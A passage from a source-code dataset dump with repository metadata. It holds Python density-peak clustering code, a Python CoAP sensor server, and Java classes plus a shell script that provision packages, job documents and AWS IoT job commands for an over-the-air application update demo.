centre_id==point.id:\n l=id2point[centre_id].label\n break\n dis=point.edge_all[centre_id]\n if dis<min_dis:\n min_dis=dis\n l=id2point[centre_id].label\n point.label=l\n\n if display:\n x = [p.x[0] for p in pts]\n y = [p.x[1] for p in pts]\n labels = [p.label for p in pts]\n cx = [id2point[id].x[0] for id in n_centre_id]\n cy = [id2point[id].x[1] for id in n_centre_id]\n clabels = [id2point[id].label for id in n_centre_id]\n plt.title('clustring result')\n plt.scatter(x, y, s=DISPLAY_SCATTER_SIZE, c=labels, marker='o')\n plt.scatter(cx, cy, s=DISPLAY_SCATTER_SIZE*3, c=clabels, marker='o')\n plt.axis('scaled')\n plt.savefig('clustring_CDP.png',dpi=500)\n plt.show()\n\n\ndef clustring_DiegoGeneric(n_centre_id:List[Point], pts:List[Point], display:bool=True,arrow:bool=False):\n pq = [] # 优先队列\n label = 1\n inqueue=set()\n solved=set()\n for centre_id in n_centre_id:\n id2point[centre_id].label = label\n label += 1\n\n for centre_id in n_centre_id:\n id2point[centre_id].cost=0\n heapq.heappush(pq, id2point[centre_id])\n inqueue.add(centre_id)\n\n while pq:\n heapq.heapify(pq)\n top = heapq.heappop(pq)\n inqueue.remove(top.id)\n solved.add(top.id)\n for id in top.edge_all:\n if id in solved:\n continue\n cost_sum=top.cost+pow(top.edge_all[id],P)\n cost=pow(cost_sum,1/P)\n if cost<id2point[id].cost:\n id2point[id].cost=cost\n id2point[id].cost_sum = cost_sum\n id2point[id].pre=top.id\n id2point[id].label=top.label\n if (id not in inqueue) and (id not in solved):\n heapq.heappush(pq,id2point[id])\n inqueue.add(id)\n\n if display:\n if arrow:\n for point in pts:\n if point.pre is not None:\n plt.arrow(point.x[0],\n point.x[1],\n id2point[point.pre].x[0]-point.x[0]-(id2point[point.pre].x[0]-point.x[0])/5,\n id2point[point.pre].x[1]-point.x[1]-(id2point[point.pre].x[1]-point.x[1])/5,\n head_width=5,\n head_length=5,\n color='red',\n alpha=0.4)\n x = [p.x[0] for p in pts]\n y = [p.x[1] for p in pts]\n labels = [p.label for p in pts]\n cx = [id2point[id].x[0] for id in n_centre_id]\n cy = [id2point[id].x[1] for id in n_centre_id]\n clabels = [id2point[id].label for id in n_centre_id]\n plt.title('clustring result')\n plt.scatter(x, y, s=DISPLAY_SCATTER_SIZE, c=labels, marker='o')\n plt.scatter(cx, cy, s=DISPLAY_SCATTER_SIZE*3, c=clabels, marker='o')\n plt.axis('scaled')\n plt.savefig('clustring_DiegoGeneric_result.png', dpi=500)\n plt.show()\n\ndef 
clustring_ours(n_centre_id:List[Point], pts:List[Point], display:bool=True,arrow:bool=False):\n pq = [] # 优先队列\n label = 1\n inqueue=set()\n solved=set()\n for centre_id in n_centre_id:\n id2point[centre_id].label = label\n label += 1\n\n for centre_id in n_centre_id:\n id2point[centre_id].cost=0\n heapq.heappush(pq, id2point[centre_id])\n inqueue.add(centre_id)\n\n while pq:\n heapq.heapify(pq)\n top = heapq.heappop(pq)\n inqueue.remove(top.id)\n solved.add(top.id)\n for id in top.edge_eps:\n if id in solved:\n continue\n cost_sum=top.cost+pow(top.edge_eps[id],P)\n cost=pow(cost_sum,1/P)\n if cost<id2point[id].cost:\n id2point[id].cost=cost\n id2point[id].cost_sum = cost_sum\n id2point[id].pre=top.id\n id2point[id].label=top.label\n if (id not in inqueue) and (id not in solved):\n heapq.heappush(pq,id2point[id])\n inqueue.add(id)\n\n if display:\n if arrow:\n for point in pts:\n if point.pre is not None:\n plt.arrow(point.x[0],\n point.x[1],\n id2point[point.pre].x[0]-point.x[0]-(id2point[point.pre].x[0]-point.x[0])/5,\n id2point[point.pre].x[1]-point.x[1]-(id2point[point.pre].x[1]-point.x[1])/5,\n head_width=5,\n head_length=5,\n color='red',\n alpha=0.4)\n x = [p.x[0] for p in pts]\n y = [p.x[1] for p in pts]\n labels = [p.label for p in pts]\n cx = [id2point[id].x[0] for id in n_centre_id]\n cy = [id2point[id].x[1] for id in n_centre_id]\n clabels = [id2point[id].label for id in n_centre_id]\n plt.title('clustring result')\n plt.scatter(x, y, s=DISPLAY_SCATTER_SIZE, c=labels, marker='o')\n plt.scatter(cx, cy, s=DISPLAY_SCATTER_SIZE*3, c=clabels, marker='o')\n plt.axis('scaled')\n plt.savefig('clustring_ours_result.png', dpi=500)\n plt.show()\n\n\nif __name__==\"__main__\":\n # id2point,pts=dataset('data/207_ecg_20190312_rr1_rr.txt','data/207_ecg_20190312_rr1_rr.gs.txt')\n id2point,pts=dataset('data/99_synthetic_dendrites.txt','data/99_synthetic_dendrites.gs.txt')\n find_edge(pts)\n decision_graph(pts)\n n_centre_id = find_albow(pts)\n\n # clustring_CDP(n_centre_id, pts)\n\n # begin=time.time()\n # clustring_DiegoGeneric(n_centre_id,pts,arrow=True)\n # end=time.time()\n # clustring_DiegoGeneric_duration=end-begin\n\n begin = time.time()\n clustring_ours(n_centre_id, pts, arrow=True)\n end = time.time()\n clustring_ours_duration = end - begin\n print(clustring_ours_duration)\n # Jaccard Coef\n a = 0\n b = 0\n c = 0\n d = 0\n for i in range(len(pts)):\n for j in range(i):\n a += (1 if pts[i].label_real == pts[j].label_real and pts[i].label == pts[j].label else 0)\n b += (1 if pts[i].label_real == pts[j].label_real and pts[i].label != pts[j].label else 0)\n c += (1 if pts[i].label_real != pts[j].label_real and pts[i].label == pts[j].label else 0)\n # d += (1 if pts[i].label_real != pts[j].label_real and pts[i].label != pts[j].label else 0)\n jc = a / (a + b + c)\n print('Jaccard Coef:', jc)\n"
}
] | 1 |
azyuqian/POEModule | https://github.com/azyuqian/POEModule | c6a9198656931e7d578c0139e9505f54c8f4547f | 629ce80dad6f8acd7534d7dd4317f5fc95f255f4 | 7816f7484e87008679375bd2e868c56ea0ed5553 | refs/heads/master | 2021-01-01T17:01:07.455026 | 2015-04-17T07:55:43 | 2015-04-17T07:55:43 | 26,605,923 | 0 | 0 | null | 2014-11-13T20:14:22 | 2014-11-22T23:13:15 | 2014-11-22T23:13:14 | Python | [
{
"alpha_fraction": 0.5532716512680054,
"alphanum_fraction": 0.5601233243942261,
"avg_line_length": 32.94186019897461,
"blob_id": "88193f5bd9e5e42ebaede1863e6dc49e2669f4a9",
"content_id": "f7fc7f6e2e3eed62c0b69026339f6bffaca1b8e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2919,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 86,
"path": "/server.py",
"repo_name": "azyuqian/POEModule",
"src_encoding": "UTF-8",
"text": "\"\"\"\n Created on November 21, 2014\n Last modified on April 17, 2015 by Yaodong Yu\n\n @author: Ruibing Zhao\n @author: Peter Zhang\n\n This is the main CoAP server running on Raspberry Pi as a part of UBC ECE 2014 Capstone Project #94.\n The implementation of this CoAP client is based on aiocoap module\n\n Reference: https://aiocoap.readthedocs.org/\n\n Python3.4 is required\n\"\"\"\n\nimport logging\nimport json\n\nimport asyncio\n\nimport aiocoap\nfrom aiocoap.resource import Site\n\nimport resources as r\n\n# logging setup\nlogging.basicConfig(level=logging.INFO)\nlogging.getLogger('coap-server').setLevel(logging.DEBUG)\n# TODO: Add logging function to replace \"print\" in the code\n\n\ndef main():\n \"\"\"\n Create resource tree from given configuration file\n \"\"\"\n\n root = Site()\n\n # default resources to add\n root.add_resource('', r.RootResource(root))\n root.add_resource(('.well-known', 'core'), r.CoreResource(root))\n\n # temporarily disabled\n #root.add_resource(('alert',), r.Alert())\n\n with open('config.json') as data_file:\n sensor_list = json.load(data_file)['sensors']\n \n for sensor in sensor_list:\n # Known sensors that has been pre-defined\n if sensor['name'] == 'hello':\n root.add_resource(tuple(sensor['url'].split('/')), r.HelloWorld())\n elif sensor['name'] == 'time':\n root.add_resource(tuple(sensor['url'].split('/')), r.LocalTime())\n elif sensor['name'] == 'accelerometer':\n root.add_resource(tuple(sensor['url'].split('/')), r.Acceleration())\n elif sensor['name'] == 'temperature':\n root.add_resource(tuple(sensor['url'].split('/')), r.Temperature())\n elif sensor['name'] == 'humidity':\n root.add_resource(tuple(sensor['url'].split('/')), r.Humidity())\n elif sensor['name'] == 'joystick':\n root.add_resource(tuple(sensor['url'].split('/')), r.Joystick())\n # For unknown sensors, use template resource\n else:\n root.add_resource(tuple(sensor['url'].split('/')),\n r.ResourceTemplate(sensor['name'],\n sensor['active'],\n sensor['period'],\n sensor['min'],\n sensor['max'],\n sensor['channel']))\n\n print(\"{} resource added to path /{}\".format(sensor['name'], sensor['url']))\n '''\n # Debug information: print all fields of each resource in configuration file\n for entry in sensor:\n if entry != 'name' and entry != 'url':\n print(\"{}:{}\".format(entry, sensor[entry]))\n '''\n\n asyncio.async(aiocoap.Context.create_server_context(root))\n asyncio.get_event_loop().run_forever()\n\n\nif __name__ == '__main__':\n main()\n"
}
] | 1 |
zhiyanliu/nightswatch-builder | https://github.com/zhiyanliu/nightswatch-builder | 87e3f8a9b6041be61f6ee9f76dcfccb79b705280 | 98eb7d87ddf36c812e816ef6387d430a9d1a3983 | 0ee7b7ff2bfd97b2dec353c4fbc674fd25be0273 | refs/heads/master | 2023-02-04T21:09:29.346583 | 2020-12-21T08:44:15 | 2020-12-21T08:44:15 | 323,258,269 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6513761281967163,
"alphanum_fraction": 0.7064220309257507,
"avg_line_length": 26.25,
"blob_id": "98ea8bb61dbfab7d5a8b71d489b8378382f89ad6",
"content_id": "9540aab51d4fab60e89f7fb49abe295b085a68d6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 109,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 4,
"path": "/demo/app_xxx_src/entry.sh",
"repo_name": "zhiyanliu/nightswatch-builder",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\necho \"Start...\"\n/opt/nightswatch-ranger/apps/app_xxx/rootfs/entry 127.0.0.1 app_xxx /qbr/demo/lcd\n"
},
{
"alpha_fraction": 0.6571911573410034,
"alphanum_fraction": 0.6623386740684509,
"avg_line_length": 51.91056823730469,
"blob_id": "51accac3f9858192ebf1bf2712f9c299bd5c92b8",
"content_id": "392604119e44bc3f7e18c3b17bb237bbbf6a3659",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 13016,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 246,
"path": "/src/main/java/com/amazonaws/rp/nightswatch/builder/appota/AppOTADemoApplication.java",
"repo_name": "zhiyanliu/nightswatch-builder",
"src_encoding": "UTF-8",
"text": "package com.amazonaws.rp.nightswatch.builder.appota;\n\nimport com.amazonaws.rp.nightswatch.builder.utils.IoTCore;\nimport com.amazonaws.rp.nightswatch.builder.utils.S3;\nimport com.amazonaws.rp.nightswatch.builder.utils.StackOutputQuerier;\nimport com.amazonaws.services.iot.AWSIot;\nimport com.amazonaws.services.iot.AWSIotClientBuilder;\nimport com.amazonaws.services.iot.model.DescribeThingRequest;\nimport com.amazonaws.services.iot.model.DescribeThingResult;\nimport org.apache.commons.io.FileUtils;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport java.io.File;\nimport java.io.FileOutputStream;\nimport java.io.IOException;\nimport java.io.PrintWriter;\nimport java.net.URL;\nimport java.util.Arrays;\nimport java.util.List;\n\npublic class AppOTADemoApplication {\n private final Logger log = LoggerFactory.getLogger(\"nightswatch-app-ota-demo-app\");\n private final StackOutputQuerier outputQuerier = new StackOutputQuerier();\n private final S3 s3Util = new S3();\n private final IoTCore jobDeleter = new IoTCore();\n\n private final static String APP_PKG_NAME = \"app_xxx_pkg\";\n private final static String APP_DEPLOY_JOB_DOC_NAME = \"deploy_app_xxx_pkg\";\n private final static String APP_DESTROY_JOB_DOC_NAME = \"destroy_app_xxx_pkg\";\n\n public final static String APP_V1_DEPLOY_JOB_ID = \"nw-app-ota-demo-deploy-app-v1\";\n public final static String APP_V2_DEPLOY_JOB_ID = \"nw-app-ota-demo-deploy-app-v2\";\n public final static String APP_V1_DESTROY_JOB_ID = \"nw-app-ota-demo-destroy-app-v1\";\n public final static String APP_V2_DESTROY_JOB_ID = \"nw-app-ota-demo-destroy-app-v2\";\n\n public void provisionV1(final String appOTADemoIoTStackName, final String arch, final String containerFlag)\n throws IOException {\n String devFileBucketName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"devfilesbucketname\");\n if (devFileBucketName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of s3 bucket to save device assert files not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n String jobDocBucketName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"jobdocbucketname\");\n if (jobDocBucketName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of s3 bucket to save job documents not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n String pkgFilePath = this.prepareAppPkg(arch, containerFlag, \"v1\");\n this.s3Util.uploadFile(this.log, devFileBucketName, pkgFilePath);\n\n List<String> result = this.prepareAppJobDoc(devFileBucketName, arch, containerFlag,\n \"v1\", \"deployment\", APP_DEPLOY_JOB_DOC_NAME);\n String deployJobDocContent = result.get(0);\n String deployJobDocFilePath = result.get(1);\n\n String deployJobDocS3ObjectPath = this.s3Util.uploadFile(this.log, jobDocBucketName, deployJobDocFilePath);\n\n String deployJobCmd = this.generateCommand(\n appOTADemoIoTStackName, deployJobDocS3ObjectPath, APP_V1_DEPLOY_JOB_ID);\n\n result = this.prepareAppJobDoc(devFileBucketName, arch, containerFlag,\n \"v1\", \"destroy\", APP_DESTROY_JOB_DOC_NAME);\n String destroyJobDocContent = result.get(0);\n String destroyJobDocFilePath = result.get(1);\n\n String destroyJobDocS3ObjectPath = this.s3Util.uploadFile(this.log, jobDocBucketName, destroyJobDocFilePath);\n\n String destroyJobCmd = this.generateCommand(\n appOTADemoIoTStackName, destroyJobDocS3ObjectPath, APP_V1_DESTROY_JOB_ID);\n\n System.out.println();\n 
System.out.println(\"Outputs:\");\n System.out.println(String.format(\"application deployment job document:\\n%s\", deployJobDocContent));\n System.out.println(String.format(\"application deployment job document url:\\n\\t%s\", deployJobDocS3ObjectPath));\n System.out.println(String.format(\"application destroy job document:\\n%s\", destroyJobDocContent));\n System.out.println(String.format(\"application destroy job document url:\\n\\t%s\", destroyJobDocS3ObjectPath));\n System.out.println(String.format(\"application deployment command line:\\n%s\", deployJobCmd));\n System.out.println(String.format(\"application destroy command line:\\n%s\", destroyJobCmd));\n }\n\n public void provisionV2(final String appOTADemoIoTStackName, final String arch, final String containerFlag)\n throws IOException {\n String devFileBucketName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"devfilesbucketname\");\n if (devFileBucketName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of s3 bucket to save device assert files not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n String jobDocBucketName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"jobdocbucketname\");\n if (jobDocBucketName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of s3 bucket to save job documents not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n String pkgFilePath = this.prepareAppPkg(arch, containerFlag, \"v2\");\n this.s3Util.uploadFile(this.log, devFileBucketName, pkgFilePath);\n\n List<String> result = this.prepareAppJobDoc(devFileBucketName, arch, containerFlag,\n \"v2\", \"deployment\", APP_DEPLOY_JOB_DOC_NAME);\n String deployJobDocContent = result.get(0);\n String deployJobDocFilePath = result.get(1);\n\n String deployJobDocS3ObjectPath = this.s3Util.uploadFile(this.log, jobDocBucketName, deployJobDocFilePath);\n\n String deployJobCmd = this.generateCommand(\n appOTADemoIoTStackName, deployJobDocS3ObjectPath, APP_V2_DEPLOY_JOB_ID);\n\n result = this.prepareAppJobDoc(devFileBucketName, arch, containerFlag,\n \"v2\", \"destroy\", APP_DESTROY_JOB_DOC_NAME);\n String destroyJobDocContent = result.get(0);\n String destroyJobDocFilePath = result.get(1);\n\n String destroyJobDocS3ObjectPath = this.s3Util.uploadFile(this.log, jobDocBucketName, destroyJobDocFilePath);\n\n String destroyJobCmd = this.generateCommand(\n appOTADemoIoTStackName, destroyJobDocS3ObjectPath, APP_V2_DESTROY_JOB_ID);\n\n System.out.println();\n System.out.println(\"Outputs:\");\n System.out.println(String.format(\"application deployment job document:\\n%s\", deployJobDocContent));\n System.out.println(String.format(\"application deployment job document url:\\n\\t%s\", deployJobDocS3ObjectPath));\n System.out.println(String.format(\"application destroy job document:\\n%s\", destroyJobDocContent));\n System.out.println(String.format(\"application destroy job document url:\\n\\t%s\", destroyJobDocS3ObjectPath));\n System.out.println(String.format(\"application deployment command line:\\n%s\", deployJobCmd));\n System.out.println(String.format(\"application destroy command line:\\n%s\", destroyJobCmd));\n }\n\n private String prepareAppPkg(final String arch, final String containerFlag,\n final String version) throws IOException {\n String packageDstPath = String.format(\"%s/target/app-ota-demo/app_%s_%s_%s\",\n System.getProperty(\"user.dir\"), arch, containerFlag, version);\n\n File packageDstPathFile 
= new File(packageDstPath);\n FileUtils.deleteDirectory(packageDstPathFile);\n boolean ok = packageDstPathFile.mkdirs();\n if (!ok)\n throw new IOException(String.format(\n \"failed to create demo application package %s directory at %s\", version, packageDstPath));\n\n String packageDstFilePath = String.format(\n \"%s/%s_%s_%s.tar.gz\", packageDstPath, APP_PKG_NAME, containerFlag, version);\n\n String packageSrcFileName = String.format(\"nw-app-ota-demo/app_%s_%s_%s/%s.tar.gz\",\n arch, containerFlag, version, APP_PKG_NAME);\n URL packageSrc = getClass().getClassLoader().getResource(packageSrcFileName);\n if (packageSrc == null)\n throw new IllegalArgumentException(\n String.format(\"application package file %s not found\", packageSrcFileName));\n\n FileOutputStream out = new FileOutputStream(packageDstFilePath);\n out.write(packageSrc.openStream().readAllBytes());\n out.close();\n\n log.info(String.format(\n \"the application package of the IoT device are prepared at %s\", packageDstFilePath));\n\n return packageDstFilePath;\n }\n\n private List<String> prepareAppJobDoc(final String jobDocBucketName, final String arch,\n final String containerFlag, final String version,\n final String deploymentFlag, final String jobDocName) throws IOException {\n try {\n String jobDocDstPath = String.format(\"%s/target/app-ota-demo/app_%s_%s_%s\",\n System.getProperty(\"user.dir\"), arch, containerFlag, version);\n\n File jobDocDstPathFile = new File(jobDocDstPath);\n FileUtils.deleteDirectory(jobDocDstPathFile);\n boolean ok = jobDocDstPathFile.mkdirs();\n if (!ok)\n throw new IOException(String.format(\"failed to create demo application %s job document directory at %s\",\n deploymentFlag, jobDocDstPath));\n\n String jobDocDstFilePath = String.format(\"%s/%s_%s.json\", jobDocDstPath, jobDocName, version);\n\n String jobDocSrcFileName = String.format(\"nw-app-ota-demo/app_%s_%s_%s/%s.json\",\n arch, containerFlag, version, jobDocName);\n URL jobDocSrcFilePath = getClass().getClassLoader().getResource(jobDocSrcFileName);\n if (jobDocSrcFilePath == null)\n throw new IllegalArgumentException(\n String.format(\"application %s job document %s not found\", deploymentFlag, jobDocSrcFileName));\n\n String doc = new String(jobDocSrcFilePath.openStream().readAllBytes());\n\n doc = doc.replace(\"<BUCKET_NAME>\", jobDocBucketName);\n doc = String.format(\"\\t%s\", doc.replace(\"\\n\", \"\\n\\t\"));\n\n PrintWriter out = new PrintWriter(jobDocDstFilePath);\n out.print(doc);\n out.close();\n\n log.info(String.format(\"the application %s job document of the IoT device are prepared at %s\",\n deploymentFlag, jobDocDstFilePath));\n\n return Arrays.asList(doc, jobDocDstFilePath);\n } catch (IOException e) {\n e.printStackTrace();\n log.error(String.format(\"failed to prepare application %s job document\", deploymentFlag));\n throw e;\n }\n }\n\n private String generateCommand(final String appOTADemoIoTStackName, final String jobDocS3ObjectPath,\n final String jobID) {\n\n String thingName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"thingname\");\n if (thingName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of IoT device not found, is the NW app OTA demo stack %s invalid?\",\n appOTADemoIoTStackName));\n\n DescribeThingRequest req = new DescribeThingRequest();\n req.setThingName(thingName);\n\n AWSIot client = AWSIotClientBuilder.defaultClient();\n DescribeThingResult result = client.describeThing(req);\n String thingARN = result.getThingArn();\n\n String s3PreSignIAMRoleARN = 
this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"s3presigniamrolearn\");\n if (s3PreSignIAMRoleARN == null)\n throw new IllegalArgumentException(String.format(\n \"the S3 pre-sign IAM role ARN not found,\" +\n \" is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n this.jobDeleter.deleteJob(this.log, jobID);\n\n String cmd =\n \"aws iot create-job \\\\\\n\" +\n \"\\t--job-id <JOB_ID> \\\\\\n\" +\n \"\\t--targets <THING_ARN> \\\\\\n\" +\n \"\\t--document-source <JOB_DOC_URL> \\\\\\n\" +\n \"\\t--presigned-url-config \" +\n \"\\\"{\\\\\\\"roleArn\\\\\\\":\\\\\\\"<PRE_SIGN_ROLE_ARN>\\\\\\\", \\\\\\\"expiresInSec\\\\\\\":3600}\\\"\";\n\n cmd = cmd.replace(\"<JOB_ID>\", jobID);\n cmd = cmd.replace(\"<THING_ARN>\", thingARN);\n cmd = cmd.replace(\"<JOB_DOC_URL>\", jobDocS3ObjectPath);\n cmd = cmd.replace(\"<PRE_SIGN_ROLE_ARN>\", s3PreSignIAMRoleARN);\n cmd = String.format(\"\\t%s\", cmd.replace(\"\\n\", \"\\n\\t\"));\n\n return cmd;\n }\n}\n"
},
{
"alpha_fraction": 0.7364290356636047,
"alphanum_fraction": 0.7377370595932007,
"avg_line_length": 42.68571472167969,
"blob_id": "e9cc9e5360bf15ce7db6698e14fdff04e7889cb1",
"content_id": "76e03dcaaf2261800a670e944c98b01d2cd79d9f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1529,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 35,
"path": "/src/main/java/com/amazonaws/rp/nightswatch/builder/appota/AppOTADemoService.java",
"repo_name": "zhiyanliu/nightswatch-builder",
"src_encoding": "UTF-8",
"text": "package com.amazonaws.rp.nightswatch.builder.appota;\n\nimport com.amazonaws.rp.nightswatch.builder.utils.StackOutputQuerier;\nimport com.amazonaws.services.iot.AWSIot;\nimport com.amazonaws.services.iot.AWSIotClientBuilder;\nimport com.amazonaws.services.iot.model.DescribeEndpointRequest;\nimport com.amazonaws.services.iot.model.DescribeEndpointResult;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport java.io.IOException;\n\npublic class AppOTADemoService {\n private final Logger log = LoggerFactory.getLogger(\"nightswatch-app-ota-demo-app\");\n private final StackOutputQuerier outputQuerier = new StackOutputQuerier();\n\n public void queryEndpoint(final String appOTADemoIoTStackName) throws IOException {\n String thingName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"thingname\");\n if (thingName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of IoT device not found, is the NW app OTA demo stack %s invalid?\",\n appOTADemoIoTStackName));\n\n DescribeEndpointRequest req = new DescribeEndpointRequest();\n req.setEndpointType(\"iot:Data-ATS\");\n\n AWSIot client = AWSIotClientBuilder.defaultClient();\n DescribeEndpointResult result = client.describeEndpoint(req);\n String endpoint = result.getEndpointAddress();\n\n System.out.println();\n System.out.println(\"Outputs:\");\n System.out.println(String.format(\"MQTT service endpoint:\\n\\t%s\", endpoint));\n }\n}\n"
},
{
"alpha_fraction": 0.6784034371376038,
"alphanum_fraction": 0.6807556748390198,
"avg_line_length": 46.90140914916992,
"blob_id": "78d1b30c714a55652664f09903133b3b9b7ae906",
"content_id": "69ec1029a3279552fc2a255a6c519b5c6602325d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 13604,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 284,
"path": "/src/main/java/com/amazonaws/rp/nightswatch/builder/appota/AppOTADemoAssert.java",
"repo_name": "zhiyanliu/nightswatch-builder",
"src_encoding": "UTF-8",
"text": "package com.amazonaws.rp.nightswatch.builder.appota;\n\nimport com.amazonaws.rp.nightswatch.builder.utils.IoTCore;\nimport com.amazonaws.rp.nightswatch.builder.utils.S3;\nimport com.amazonaws.rp.nightswatch.builder.utils.StackOutputQuerier;\nimport com.amazonaws.services.iot.AWSIot;\nimport com.amazonaws.services.iot.AWSIotClientBuilder;\nimport com.amazonaws.services.iot.model.CertificateDescription;\nimport com.amazonaws.services.iot.model.DescribeCertificateRequest;\nimport com.amazonaws.services.iot.model.DescribeCertificateResult;\nimport com.amazonaws.services.iot.model.UpdateCertificateRequest;\nimport org.apache.commons.io.FileUtils;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport java.io.*;\nimport java.net.URL;\nimport java.util.Arrays;\nimport java.util.List;\nimport java.util.zip.ZipEntry;\nimport java.util.zip.ZipOutputStream;\n\npublic class AppOTADemoAssert {\n private final Logger log = LoggerFactory.getLogger(\"nightswatch-app-ota-demo-asset\");\n private final StackOutputQuerier outputQuerier = new StackOutputQuerier();\n private final S3 s3Util = new S3();\n private final IoTCore jobDeleter = new IoTCore();\n\n private final static String PUB_KEY_NAME = \"nw-app-ota-demo-dev-public\";\n private final static String PRV_KEY_NAME = \"nw-app-ota-demo-dev-private\";\n private final static String ROOT_CA_NAME = \"root-ca.crt\";\n\n private final static String CREDENTIALS_FILE_NAME = \"credentials.zip\";\n private final static String RANGER_PKG_FILE_NAME = \"nightswatch-ranger.tar.gz\";\n\n public void provision(final String appOTADemoIoTStackName) throws IOException {\n String devFileBucketName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"devfilesbucketname\");\n if (devFileBucketName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of s3 bucket to save device assert files not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n String certId = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"certid\");\n if (certId == null)\n throw new IllegalArgumentException(String.format(\"the thing certificate ID not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n // Night's Watch - Ranger stuff\n String zipFilePath = this.prepareCredentials(certId);\n String pkgFilePath = this.prepareNightsWatchRangerPackage();\n this.s3Util.uploadFile(this.log, devFileBucketName, zipFilePath);\n this.s3Util.uploadFile(this.log, devFileBucketName, pkgFilePath);\n\n String preSignedCredentialsPackageURL = this.s3Util.getObjectPreSignedUrl(\n this.log, devFileBucketName, AppOTADemoAssert.CREDENTIALS_FILE_NAME, 7);\n String preSignedRangerPackageURL = this.s3Util.getObjectPreSignedUrl(\n this.log, devFileBucketName, AppOTADemoAssert.RANGER_PKG_FILE_NAME, 7);\n\n String scriptFilePath = this.prepareSetupScript(preSignedCredentialsPackageURL, preSignedRangerPackageURL);\n\n this.s3Util.uploadFile(this.log, devFileBucketName, scriptFilePath);\n\n log.info(String.format(\"the device files is prepared at %s\", devFileBucketName));\n }\n\n public void deProvision(final String appOTADemoIoTStackName) {\n String devFileBucketName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"devfilesbucketname\");\n if (devFileBucketName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of s3 bucket to save device assert files not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n String 
jobDocBucketName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"jobdocbucketname\");\n if (jobDocBucketName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of s3 bucket to save job document not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n String certId = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"certid\");\n if (certId == null)\n throw new IllegalArgumentException(String.format(\"the thing certificate ID not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n this.deactivateThingCert(certId);\n log.info(String.format(\"the device certificate %s is deactivated\", certId));\n\n this.s3Util.emptyBucket(this.log, devFileBucketName);\n log.info(String.format(\"the device files S3 bucket %s is cleaned up to empty\", devFileBucketName));\n\n this.s3Util.emptyBucket(this.log, jobDocBucketName);\n log.info(String.format(\"the job docs S3 bucket %s is cleaned up to empty\", jobDocBucketName));\n\n this.deleteJobs();\n log.info(\"all jobs are deleted\");\n }\n\n private void generateCredentials(String certId, String certFilePath, String rootCaPath,\n String publicKeyPath, String privateKeyPath) throws IOException {\n\n AWSIot iotClient = AWSIotClientBuilder.defaultClient();\n\n log.debug(\"connected to AWS IoT service\");\n\n log.debug(String.format(\"fetching certificate %s ...\", certId));\n\n DescribeCertificateRequest req = new DescribeCertificateRequest();\n req.setCertificateId(certId);\n DescribeCertificateResult describeCertificateResult = iotClient.describeCertificate(req);\n CertificateDescription certDesc = describeCertificateResult.getCertificateDescription();\n\n PrintWriter out = new PrintWriter(certFilePath);\n out.print(certDesc.getCertificatePem());\n out.close();\n\n log.info(String.format(\"the IoT device certificate %s is downloaded at %s, status: %s\",\n certId, certFilePath, certDesc.getStatus()));\n\n String fileName = String.format(\"nw-app-ota-demo/%s\", ROOT_CA_NAME);\n URL rootCa = getClass().getClassLoader().getResource(fileName);\n if (rootCa == null)\n throw new IllegalArgumentException(\n String.format(\"root CA certificate file %s not found\", fileName));\n\n out = new PrintWriter(rootCaPath);\n out.print(new String(rootCa.openStream().readAllBytes()));\n out.close();\n\n log.info(String.format(\"the IoT device root CA certificate is generated at %s\", rootCaPath));\n\n fileName = String.format(\"nw-app-ota-demo/%s.key\", PUB_KEY_NAME);\n URL key = getClass().getClassLoader().getResource(fileName);\n if (key == null)\n throw new IllegalArgumentException(String.format(\"private key file %s not found\", fileName));\n\n out 